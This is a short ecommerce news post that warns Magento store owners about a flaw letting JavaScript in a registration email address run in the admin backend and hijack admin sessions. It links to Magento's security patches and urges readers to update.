Magento security flaw exposed – have you fixed it?

No primary category set

If you run a Magento driven webstore or ecommerce site it’s time to make sure that you’re running a protected version of the system because a significant security flaw has be revealed. And if you don’t run the site personally, it’s a good idea to get in touch with your supplier to make sure you’re sorted. They may well have been in touch already.

Here’s what Magento says of the flaw: “During customer registration on the storefront, a user can provide an email address that contains JavaScript code. Magento does not properly validate this email and executes it in Admin context when viewing the order in the backend. This JavaScript code can steal an administrator session or act on behalf of a store administrator.”

Apparently both versions 1 and 2 of Magento are affected and the problem can be exploited just by registering with a ‘spiked’ username or email address. That means there can be vulnerability from an automated hack attack. The risks means that a Magento store can effectively be hijacked meaning user data like passwords and payment details could be at risk.

Here are the two security updates you need to familiarise yourself with:

https://magento.com/security/patches/supee-7405

https://magento.com/security/patches/magento-201-security-update

Were you aware of these problems and have you been affected? Hopefully not.

RELATED POSTS..

Stuart Hill Ex Matches COO on transitioning to logistics at DHL

Stuart Hill Ex Matches COO on transitioning to logistics at DHL

Temu MASA Certification for User Security and Privacy

Temu MASA Certification for User Security and Privacy

TikTok European User Data Security update

TikTok European User Data Security update

Hack4Values Pro Bono bug hunters for NGOs & nonprofits

Hack4Values Pro Bono bug hunters for NGOs & nonprofits

TikTok Project Clover to safeguard UK EEA User Data

TikTok Project Clover to safeguard UK EEA User Data

Featured in this article from the ChannelX Guide – companies that can help you grow and manage your business.

Register for Newsletter

Receive 5 newsletters per week

Gain access to all research

Be notified of upcoming events and webinars